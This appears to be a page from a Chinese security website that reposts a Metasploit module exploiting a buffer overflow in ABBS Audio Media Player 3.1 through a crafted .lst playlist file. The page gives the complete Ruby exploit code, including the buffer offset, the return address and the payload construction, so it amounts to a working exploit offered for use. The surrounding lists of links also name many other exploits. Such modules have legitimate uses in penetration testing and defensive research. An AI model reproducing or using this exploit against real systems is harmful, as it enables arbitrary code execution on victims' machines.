首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ABBS Audio Media Player .LST Buffer Overflow
来源:metasploit.com 作者:Ahrens 发布时间:2013-07-03  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ABBS Audio Media Player .LST Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability
				occurs when adding an .lst, allowing arbitrary code execution with the privileges
				of the user running the application . This module has been tested successfully on
				ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Julian Ahrens', # Vulnerability discovery and PoC
					'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
				],
			'References'     =>
				[
					[ 'OSVDB', '75096' ],
					[ 'EDB', '25204' ]
				],
			'DefaultOptions'  =>
				{
					'EXITFUNC' => 'process',
				},
			'Platform'       => 'win',
			'Payload'        =>
				{
					'BadChars'        => "\x00\x0a\x0d",
					'DisableNops'     => true,
				},
			'Targets'        =>
				[
					[ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',
						{
							'Ret'     => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe
							'Offset'  => 4108,
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 30 2013',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),
			], self.class)

	end

	def exploit
		buffer = payload.encoded
		buffer << rand_text(target['Offset'] - (payload.encoded.length))
		buffer << [target.ret].pack('V')

		file_create(buffer)
	end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FileCOPA 7.01 Denial Of Servic
·Realtek Sound Manager AvRack (
·WinAmp 5.63 - Stack-based Buff
·Nokia 1280 Denial Of Service
·WinAmp 5.63 - Invalid Pointer
·Opera 12.15 Denial Of Service
·Windows EPATHOBJ::pprFlattenRe
·InstantCMS 1.6 Remote PHP Code
·AudioCoder (.lst) - Buffer Ove
·Adobe Reader X 10.1.4.38 - BMP
·Static HTTP Server 1.0 - SEH O
·OpenNetAdmin 13.03.01 Remote C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved